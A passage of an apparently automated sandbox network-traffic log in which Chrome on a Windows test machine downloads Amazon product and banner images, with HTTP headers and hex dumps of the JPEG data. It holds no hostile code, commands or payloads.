                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC1378INData Raw: 39 da 75 df 24 6f 96 8b 67 ac 14 01 76 d4 21 87 36 ef 7d b4 8c b9 a4 54 a6 41 a9 50 aa c5 c5 8d d4 72 c9 ab 4a 5d da 05 68 5b d6 6a dd f1 bc ce 5c 5f bb cb ff 00 0b db ff 00 94 d1 86 09 91 1e 2b ac 04 4b 41 7b 88 1a e7 f8 91 47 7c b2 8b da 7c 11 30 74 ff 00 a5 df 2b 12 9f 86 bf b8 ac 2d da 6f a2 36 8e fa ff 00 33 17 42 d3 d5 86 95 36 2c 09 4d 8c 02 c2 ca 2d 55 d3 48 2e 77 50 f0 92 62 53 a6 30 76 49 83 e6 d3 3b 36 58 35 a9 c7 f3 79 7f c5 f0 be 1d dc d7 7c cf 8b 95 41 de f0 d6 3f f4 42 1b 46 35 88 b8 ef 11 05 d2 1d 4f 56 52 35 b2 25 9b de d8 20 d1 67 70 37 e2 e3 22 dc 5e 5f 36 35 98 0c c2 b8 99 90 3b f5 d5 7d 08 68 40 37 41 82 54 41 bc 23 f2 71 54 8e 82 42 e5 60 af 3d ed 3a d3 31 b3 56 70 d7 41 66 2d 83 18 2c 16 ec 4c f2 58 aa 47 d4 4f 71 80 6d 96 2a 05 f2
                                                                                                                                                                                                                                                                Data Ascii: 9u$ogv!6}TAPrJ]h[j\_+KA{G||0t+-o63B6,M-UH.wPbS0vI;6X5y|A?BF5OVR5% gp7"^_65;}h@7ATA#qTB`=:1VpAf-,LXGOqm*
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC595INData Raw: 7c bf 85 c4 08 55 b0 70 64 33 44 2e 9c c6 d5 77 4c e1 ce 67 25 61 2b 9f 87 fc 4b 05 14 6d 1c f3 36 50 6a ba 01 66 b5 11 6b d2 d1 a3 4e 27 1b f8 40 07 02 34 2e b7 cb 18 a4 64 ce 42 de b7 75 83 d2 17 b0 60 92 cf a8 49 8d 51 84 80 ba 2a c6 e8 fb 43 72 f6 65 07 2f 10 92 8d 87 ea 27 4d e7 b4 a3 6f 4b 84 a3 5e b1 a3 2e cb 7b a1 ab 64 a3 44 7a b3 3d 76 b4 4f 45 81 b6 c4 ea 69 7b de ac bb 42 91 b3 42 0e 4b 04 60 d2 c8 06 fd 60 83 5d 4a 28 15 06 c1 92 6a d7 b5 3e 4c c2 8b d9 89 62 da fb cc c8 07 e1 65 c1 b2 62 06 5c f5 2c c9 4d f4 48 7d 86 60 14 85 d1 10 58 e3 56 f2 cc 6c 8b 4b c6 7c dc 5c 6e e5 41 8f 0d 1d 48 ab 6e 86 0d 43 08 6b 05 c6 4d 58 3d a0 35 20 73 ef 0f 14 ea 3c 33 92 f5 bc c2 6c 2c f1 e9 01 bd 9e b9 19 b1 57 69 43 19 79 47 a7 e1 97 cb 23 0a df 1b a3 90
                                                                                                                                                                                                                                                                Data Ascii: |Upd3D.wLg%a+Km6PjfkN'@4.dBu`IQ*Cre/'MoK^.{dDz=vOEi{BBK``]J(j>Lbeb\,MH}`XVlK|\nAHnCkMX=5 s<3l,WiCyG#


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                131192.168.2.450009151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC683OUTGET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-YjI1NWNkYTQt-w379._SY304_CB641947165_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC660INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 25781
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: a6a8b5e6-f534-4e38-b5ed-eeae019e3dda
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Thu, 02 Sep 2021 17:01:37 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Thu, 03 Mar 2044 20:12:35 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 4075993
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:42 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000092-IAD, cache-nyc-kteb1890044-NYC
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 84 00 03 02 02 03 02 02 03 03 03 03 04 03 03 04 05 08 05 05 04 04 05 0a 07 07 06 08 0c 0a 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c2 00 11 08 01 30 01 7b 03 01 22 00 02 11 01 03 11 01 ff c4 00 38 00 01 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 07 05 06 08 09 02 03 04 01 0a 01 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 05 02 03 04 06 07 01 08 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 da 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: JFIF0{"8
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC1378INData Raw: ba 8e c5 89 70 96 d5 63 db 95 6b ab d5 3a e5 3a bd 78 53 f6 91 e1 8c 6a e7 db b1 48 d6 fd ec 34 fb 95 36 14 8e 34 55 e7 d8 a7 5c 6e 4e 04 4b 53 2d d7 93 46 61 4b 90 5c df b3 6b 7d a7 9f 22 d7 a1 e3 f6 3c 00 00 00 00 1e e8 8a f1 b3 79 69 ff 00 52 65 b5 b7 09 dc 38 33 99 2b 0a d2 29 79 d9 b6 45 a5 7a 5a 59 dc 1f af e5 72 89 66 6b 95 7e 89 27 66 c3 54 7d 97 6b 6f e6 71 55 0e 6a f9 56 3c 3b e7 bd ef fc 29 58 02 a3 92 55 6b d8 f8 b5 c7 2c 6b 78 77 70 8b b7 35 ed 9b ac 3e fb 92 5e 4c fc 08 2f d9 35 75 7b 44 35 c3 2b fe c2 ec 38 c1 d9 94 51 44 1e 54 21 45 bb 68 36 f6 8c a3 d9 b6 b2 36 6d 2d a2 72 19 90 80 00 3c c7 6f 5d 0e df 2f 4f 0c 47 1c 9a e6 a0 66 7c 3f ad f7 cb 46 e2 a7 55 35 9e d9 9e 18 d3 25 c4 3b 2f 34 c7 db 72 ec b4 ae 73 2b 92 f5 b1 64 bb 79 71 ff 00
                                                                                                                                                                                                                                                                Data Ascii: pck::xSjH464U\nNKS-FaK\k}"<yiRe83+)yEzZYrfk~'fT}koqUjV<;)XUk,kxwp5>^L/5u{D5+8QDT!Eh66m-r<o]/OGf|?FU5%;/4rs+dyq
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC1378INData Raw: 42 85 db 4f ca 74 c8 4e 23 fe c6 2a 90 41 33 c3 5e f0 cb 98 05 25 28 4e c0 bd 72 a8 26 89 06 c1 85 e6 39 14 80 ab 79 9f 1c d6 c6 89 29 e5 11 5d d1 60 2c e6 92 18 45 16 6c 71 f5 1c cc 95 00 0b 92 a0 85 15 76 8e 16 b2 da 16 df 2d 53 b3 1e 3e 28 5e d9 16 30 d3 bb 94 6c e2 c7 0e c0 4a b8 d4 9e ef 1c ec 53 5f ee 2d 63 c7 2f 62 4b 93 21 14 63 19 de f3 39 ef 2c 4f c2 03 18 21 ed b3 77 20 9e 32 f3 c5 23 09 e5 6b 9a f0 31 30 0c 27 1d dc 79 9b 0d cc 0c 76 8d a1 6f 4b ec 42 f4 41 10 6b 34 fd 96 4c 61 0e 31 94 f2 18 69 71 e0 c8 46 10 88 5a 49 84 90 af 43 d4 9c f6 af 94 b4 f4 7d 82 4f 55 96 31 50 c8 ad 33 eb 06 35 fc 13 b0 e3 c9 2f f5 e4 15 fe af 0b e4 ef 4c b2 d6 56 87 b0 40 cd 06 af 91 09 ad 68 8d f1 1a c0 78 5f 88 33 9c fe 4a cd 79 39 a9 8d f8 89 3b 65 4c ae ba ef
                                                                                                                                                                                                                                                                Data Ascii: BOtN#*A3^%(Nr&9y)]`,Elqv-S>(^0lJS_-c/bK!c9,O!w 2#k10'yvoKBAk4La1iqFZIC}OU1P35/LV@hx_3Jy9;eL
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC1378INData Raw: a9 4d bf 7e d7 7c ef 17 95 db b6 5f df 1d 84 7a 28 91 99 0d a2 2b e3 be 3a 05 5c 5e 6f 8b 34 71 e4 17 95 a9 9e 4b 47 97 0c 4e d2 aa ab 03 8a 4d 57 b4 a5 67 44 8e 7c d2 0c 8c 62 a7 25 72 f8 b3 2a 86 d5 37 9a 5b 5a b4 4f 93 9f 0c ff 00 4a 8f ec a0 89 4f 36 73 12 5c fe d0 5a 84 1d c3 fb 0d 4d 93 8d 2b 55 03 b7 c9 97 13 52 db 1a ba 4e 9f 92 07 6b 3b 87 ca ed 0d 66 b0 b9 61 dc 77 12 51 ec ac 4d 2e 5b 00 8b ea 01 8c 44 6b 92 d9 8d 51 a3 96 b1 13 bf 2b b6 c5 f0 4c b7 20 0d 6c a4 00 e3 ac 92 2b 12 55 0c b0 b9 5a 8f f0 5d 95 13 7c ad 9e e9 2f 27 68 8f 39 f0 dc 26 91 e7 ef 09 7c 8a 73 a3 db e2 d7 2b 37 d8 92 1e e4 e2 ad 5f 96 f9 5f 2d 03 23 25 cd 56 d4 bc 29 f0 d7 f4 9c 7f b2 64 b7 c3 65 bb c4 59 9d 18 54 ac 8b d9 8d 63 21 d2 65 44 97 3e 86 43 df 05 4f 2e da 6f 69
                                                                                                                                                                                                                                                                Data Ascii: M~|_z(+:\^o4qKGNMWgD|b%r*7[ZOJO6s\ZM+URNk;fawQM.[DkQ+L l+UZ]|/'h9&|s+7__-#%V)deYTc!eD>CO.oi
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC1378INData Raw: 4f c1 4a 7a 31 78 c0 b6 5a 52 34 b0 60 7c 44 8c ff 00 09 91 ee 82 e3 4a ec 13 ea 3a 50 c2 c8 e7 19 9a 00 f3 e9 15 ac 6b e3 9a 13 fc ce 7f 7f 44 ad 8e d1 e4 dd 73 09 15 7a 73 f5 64 93 05 ae 8c 39 cf f3 a1 63 ca 58 53 3a a0 59 b5 d2 9c aa f4 7d 70 d8 aa db 02 c8 94 83 73 9a 83 8f 08 44 c3 a2 39 9c db 1d 7c 99 f0 f9 57 bf 9f f6 4e 77 1c ba 32 9a ba 48 99 dc 56 8c 6a 22 bf 4f d9 3d d9 5d 4f 38 12 46 43 da 55 4a 9f 25 c4 02 69 99 b9 14 36 b0 e0 92 20 df a7 66 b9 ca b9 f4 ec dd bc 7e 9d 9f 8f d3 13 1f 9f 4a 4f 4f 4f a5 6c 73 e9 4b 05 f5 66 95 b2 17 b3 b8 ef 53 d1 d4 17 4f f7 2e 93 b1 55 dd 7e 95 b2 4f 4f a5 ed 33 e9 6b 3c fa 62 d3 3e 97 b4 cf a5 ed 33 e9 7b 4c 4d 2f 6a 99 f4 e5 ba fa a6 9e b6 41 ab 50 3a 7a d0 69 b6 69 1a d9 f5 d7 2d 39 c6 5e a7 d9 71 4c e0 dc
                                                                                                                                                                                                                                                                Data Ascii: OJz1xZR4`|DJ:PkDszsd9cXS:Y}psD9|WNw2HVj"O=]O8FCUJ%i6 f~JOOOlsKfSO.U~OO3k<b>3{LM/jAP:zii-9^qL
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC1378INData Raw: 97 1e f1 fd ca 2a 7e 22 98 6b be a9 b7 5c 3a bd c9 b0 dd a5 71 69 f7 ad 13 8d 6b 8b 10 84 8d d7 7f 54 21 a8 d9 74 d3 d6 84 3f c8 7d e8 43 79 98 83 73 f5 46 f3 f4 cf 18 0e df 6f 91 38 e2 65 8c 86 ed 0e ff 00 c2 b3 7c ae d0 fc 4e 95 d7 bb 4e 07 d4 a0 f9 2e f9 18 6a d1 f7 b0 04 2b 43 e1 b2 e7 1b 22 79 69 38 e1 5a 62 72 af 68 51 d1 bb 25 8e a7 bc 62 7b 53 aa 32 4e 2a d5 e2 bf d4 17 94 46 3f b4 cc 5a 53 c3 fa b9 3e bd 9f 9b 94 5d 21 c0 52 e5 cd 9b bf 6b 82 3c be 6f ec f9 ab eb df ec f2 2e 8b dd eb 54 6b 2b 59 67 90 54 02 71 a7 12 af 78 42 48 5c 58 ef 94 56 80 ed a3 72 a5 41 ee 5e 08 b2 49 71 85 c2 36 d9 db ad c3 25 61 6d 82 42 4b 6f 59 09 8f 1e ca 55 38 da ac 03 39 7a 71 fd ed fd 7c a2 b5 51 b8 be 97 b5 45 55 fa 6c d2 0a 15 d2 9d 9f 9b 97 1c 5b bf 70 df fb 54
                                                                                                                                                                                                                                                                Data Ascii: *~"k\:qikT!t?}CysFo8e|NN.j+C"yi8ZbrhQ%b{S2N*F?ZS>]!Rk<o.Tk+YgTqxBH\XVrA^Iq6%amBKoYU89zq|QEUl[pT
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC1378INData Raw: e5 ba 07 e2 c6 39 cd bd a4 38 1c 3a 88 1e ad eb 41 64 81 ce a7 8e be 4b f7 91 4f 8c 53 2e b2 31 7b 07 0e ac 32 4c 7b 1f 20 a3 9c d6 e7 52 38 f0 50 1b c5 c6 b7 a8 08 d6 38 53 1d a1 4a 30 e8 c0 69 d9 50 4a 38 5d bc 6a 43 43 4f c5 d5 47 55 b7 89 ae 7d 60 ed 06 f7 26 24 aa f3 6b 7b f4 5f 58 ff 00 5f 91 12 2c ac 7e b0 1d 27 39 d4 68 4e 7c 36 2b 3c ed bb 38 3a f8 96 d0 37 aa f6 69 86 40 cb 53 5a d6 b8 d6 ae a3 33 3d 65 7d 20 b2 34 57 b2 45 fc 3b 9d ff 00 c0 3d ea ca 6d 4c 6d b2 42 e8 6a 5b 7c 0b bb 7b 3d 0a c6 6c b6 53 e2 58 06 4e 61 38 fc 70 5c d0 ed 23 38 07 62 9c 20 b4 0f 3b 98 ef 72 ab 43 8d 38 38 21 ab 2e b8 5f c4 47 f9 87 2b 2e 62 dc 2e dd 39 72 b1 b5 bc 4d fd bd 49 b1 87 42 59 aa 24 d1 17 1b ba d5 71 75 7a 3b 37 a9 5c e8 1a da be 46 48 db 8e 17 48 ba ea
                                                                                                                                                                                                                                                                Data Ascii: 98:AdKOS.1{2L{ R8P8SJ0iPJ8]jCCOGU}`&$k{_X_,~'9hN|6+<8:7i@SZ3=e} 4WE;=mLmBj[|{=lSXNa8p\#8b ;rC88!._G+.b.9rMIBY$quz;7\FHH
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC1378INData Raw: b1 21 3d af 04 eb 32 9a bd 40 53 20 a6 22 f0 d5 7f 49 bb 4b 6b d5 97 51 e0 87 21 44 e3 11 c9 b5 f4 ec f9 e6 9b 0d af 6c c0 56 39 3a f7 15 72 78 cf 4a 33 50 50 a7 0e 4b 33 1e 23 14 ad ea 28 db 1e a5 29 5c 39 77 2f 1a eb c7 c5 89 09 d8 ee 8e cd 88 b8 51 f7 b9 d9 eb 0d 8a 57 41 2f 4b 3b ae e3 c1 5b 22 3f 7a bf ec 40 3c 4b 99 69 a9 ec f7 23 79 87 1a 84 f0 4e e2 9d 71 ee c5 d1 e6 d3 d6 14 8d 82 d3 0b 83 5d 41 79 bd 9e 95 69 c4 57 5a ed 30 e2 ae 5a 21 76 6e 66 2a ca 6d 10 e9 64 7b 24 64 ec 68 2d 73 8b a8 6a 6a 33 56 4b 2b 66 b8 63 6d a6 39 7c 5b 07 dd e7 76 53 62 86 c1 7e 30 35 9f 2b dc 30 db 4b 98 77 ab 05 95 e1 8e a9 6b 67 bd 25 29 4d 4b cd 00 2f 02 4a c1 3b 8c 8e f1 f1 54 b8 e6 69 79 47 ad 79 ef 20 64 db cf 2e a5 7b 53 bf 0b 50 d5 6d 1a 49 af 8a 65 c0 6b de
                                                                                                                                                                                                                                                                Data Ascii: !=2@S "IKkQ!DlV9:rxJ3PPK3#()\9w/QWA/K;["?z@<Ki#yNq]AyiWZ0Z!vnf*md{$dh-sjj3VK+fcm9|[vSb~05+0Kwkg%)MK/J;TiyGy d.{SPmIek
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC1378INData Raw: cf 03 ff 00 08 6d 93 49 15 b2 ae 74 8c b6 99 97 51 bf 24 62 62 57 a4 e4 53 d6 3e 3b 73 2f 62 57 c6 e1 c2 e6 52 e7 bc bb b9 81 fa 47 0c f8 df b4 a8 00 df 7b c3 18 e8 a5 db 2f 12 d6 75 95 f0 9a 3d 1a 2a 9d bf c9 c2 17 16 f8 a8 62 21 ca 9c ba d7 79 7e a9 51 67 d4 96 ac 4a 31 dd 58 e2 00 00 41 87 0f 2c 3e 96 a8 2f 17 01 7e 6b c4 bf a0 07 e4 2a 1e b3 62 83 85 4e 7a c7 2e a5 bb 81 39 0e 4f 93 db bc 17 5b 63 fd c4 a9 7f 09 8c 53 2b b9 94 73 1d d7 a1 5e b3 02 65 8e d3 68 4b fa 49 c8 c1 97 2d 6d 70 4f 0a de 6d bc 1d 60 98 9c 6e 8b 2c 79 2f d5 1b 6d 4b 85 69 9c 18 62 25 54 14 85 32 08 ae 38 8c 37 05 15 4d 4c 8e 8f 54 83 6e a6 9b fe 0f a7 11 d8 b9 fc 50 cc b5 a8 14 7a dc bb c2 81 1b 1a f9 dc b5 76 55 ac 3a 98 37 85 a4 5d 5e fd d9 99 1b 2d c0 ad b3 00 0e 2d 44 e1 aa
                                                                                                                                                                                                                                                                Data Ascii: mItQ$bbWS>;s/bWRG{/u=*b!y~QgJ1XA,>/~k*bNz.9O[cS+s^ehKI-mpOm`n,y/mKib%T287MLTnPzvU:7]^--D
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC1378INData Raw: c1 9a 4f 3d 3d b9 fa ca a9 b9 b4 ba f3 ea 72 fa 7a c2 ed 05 5c c7 39 2e a6 06 46 07 a0 f0 07 1c a3 12 29 ca a7 2a ee ac ab c2 0f ac db de 62 71 f2 47 e0 bc d6 1c 46 d3 b1 72 e0 3f bf 11 d1 67 e0 fe 9a 30 2e 41 d0 8b 59 0f d7 99 9a 2b 98 cf 52 54 f8 86 28 04 c4 e4 c9 ab c8 53 65 11 6f 9c dd 80 65 2d ad 0b 5c ee 2b 0b 02 56 42 63 b3 86 25 8d f8 47 0c d2 db 71 75 82 d7 32 d3 a5 01 91 a9 40 d5 5b 14 72 99 7a 83 76 14 31 7d 5f 45 4c 2a aa 07 be 8a b2 df 92 59 ac 77 5c a1 58 d3 1c 25 16 89 0c 61 0b 28 94 d9 8b 32 0c e9 89 8c 8e 28 2d 79 79 60 97 ea 63 b4 7a f5 6b 77 a6 5c e0 cc dd 97 ba b2 ef 7c dc 66 6d d3 ee 42 97 7e cf f0 9e 47 6d ac c9 e4 14 82 87 6d ea 70 73 1e 30 f7 82 57 ea ca aa 5b 8d 3c c0 dc 5a 02 3a 95 6b d7 d5 d2 12 8e 16 05 0f a0 2e b0 ae 23 62 00
                                                                                                                                                                                                                                                                Data Ascii: O==rz\9.F)*bqGFr?g0.AY+RT(Seoe-\+VBc%Gqu2@[rzv1}_EL*Yw\X%a(2(-yy`czkw\|fmB~Gmmps0W[<Z:k.#b


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                132192.168.2.450008151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC716OUTGET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07s96bn4y_379x304_ae-en._SY116_CB623271922_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 3947
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 6b240525-7238-4ff7-8a7f-6fb7c1ed6f40
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Mon, 11 Apr 2022 11:01:52 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Wed, 23 Dec 2043 17:10:49 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 2324187
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:42 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000103-IAD, cache-nyc-kteb1890093-NYC
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 91 03 01 22 00 02 11 01 03 11 01 ff c4 00 95 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 05 00 03 04 07 02 06 08 01 09 10 00 01 03 02 04 01 09 03 07 08 0a 03 00 00 00 00 01 02 03 11 00 04 05 12 21 31 41 06 07 13 22 51 61 71 91 b1 14 b2 c1 23 32 72 81 82 a1 b3 15 42 53 73
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1A"Qaq#2rBSs
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC1378INData Raw: e6 22 a7 8c 6a ed e1 0a ba 75 51 c0 be b3 03 f6 ab 4f f3 a7 9b b4 b1 6e 56 b1 63 2a 7a d2 fd 00 71 38 73 c1 3e 64 01 55 f3 fc f1 e0 60 90 15 70 7b ba 00 3d 56 2b 9f b0 c5 87 ee ed 5a bc 7d c6 98 5b c8 4b ae 17 14 32 24 9e b9 93 98 4a 47 71 8a 07 8f da d8 db bf 96 c2 e5 77 2d c6 ae 2d 9e 80 cc 99 01 39 94 48 1c 14 63 37 60 8a a9 d0 82 e5 63 a2 97 cf 1e 12 4f 51 bb 85 7d 86 c6 da fe 92 a0 2f 9e 3c 34 6d 6f 70 7c 4a 07 c4 d7 3f 5a 27 ac bf d5 b9 e9 4d b8 28 ec e2 5c ea fb 5f 3c 76 31 02 d1 d3 e2 ea 47 c0 d3 0a e7 99 89 d2 c9 71 fa f1 3e e5 50 8d 8d 4d 3c 91 47 6b 11 ce ba 3a cb 9d 8c 26 ea 12 ea 1e 6b c5 b0 e2 7c d0 4a bf eb 5b 53 5c b9 c1 9d 82 71 06 84 f6 e7 91 e2 9c b3 5c e7 83 bd 81 35 6e ef b7 37 70 5f 2d bf 05 2b 48 63 31 49 e8 20 40 5c 85 c1 56 62 53
                                                                                                                                                                                                                                                                Data Ascii: "juQOnVc*zq8s>dU`p{=V+Z}[K2$JGqw--9Hc7`cOQ}/<4mop|J?Z'M(\_<v1Gq>PM<Gk:&k|J[S\q\5n7p_-+Hc1I @\VbS
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC1191INData Raw: 4a 52 5f b4 f2 b2 88 59 1e b3 9f aa 77 dd a6 97 59 59 1f 94 70 76 36 ef bb 58 2e 99 09 72 7b 04 b9 c7 af ed 70 eb 34 85 3d 72 e2 52 80 4c 24 4e e5 47 58 09 12 4d 58 2f f3 49 8a 7e 55 46 0d 6a e3 4f be a4 3c a5 6a 5b 0d a5 9d d4 a9 9d 15 23 21 e3 55 be 0f 8a 3d 85 5c a2 ea d9 6a 6d e6 8c b6 ea 15 95 48 30 41 23 43 b8 31 5b 55 af 2f b1 5b 5b cf ca 0d de 3c 2e 32 29 1d 21 28 59 ca b8 2a 10 53 10 62 8d 80 bc 53 93 97 18 5d c9 b7 5a db 59 e8 c2 b3 25 70 00 92 08 21 40 14 ad 24 41 49 a0 7d 12 94 da dc 1f 31 26 09 91 be fb 6f 5b 5b 3c ac 5a 9e ba 7e e1 a6 ae 96 fa 60 9b 8b 64 ba 11 ac cb 70 a4 e5 51 e2 ad e8 77 e5 0b 61 66 f5 af b2 31 2e 2d 6a e9 cb 6b 0f 23 34 42 52 42 f2 e5 4c 68 22 8d 82 9f 9b f4 7e 02 ad fe 4d a6 6d 6d 87 fb 2d fb b5 50 ab 7f b2 3d 05 5c 7c
                                                                                                                                                                                                                                                                Data Ascii: JR_YwYYpv6X.r{p4=rRL$NGXMX/I~UFjO<j[#!U=\jmH0A#C1[U/[[<.2)!(Y*SbS]ZY%p!@$AI}1&o[[<Z~`dpQwaf1.-jk#4BRBLh"~Mmm-P=\|


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                133192.168.2.450011151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC700OUTGET /images/G/39/AHS_UAE/2024/UDS/GW/QC/Furniture/XCM_CUTTLE_1690813_3610035_186x116_1X_en_AE._SY116_CB582137121_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
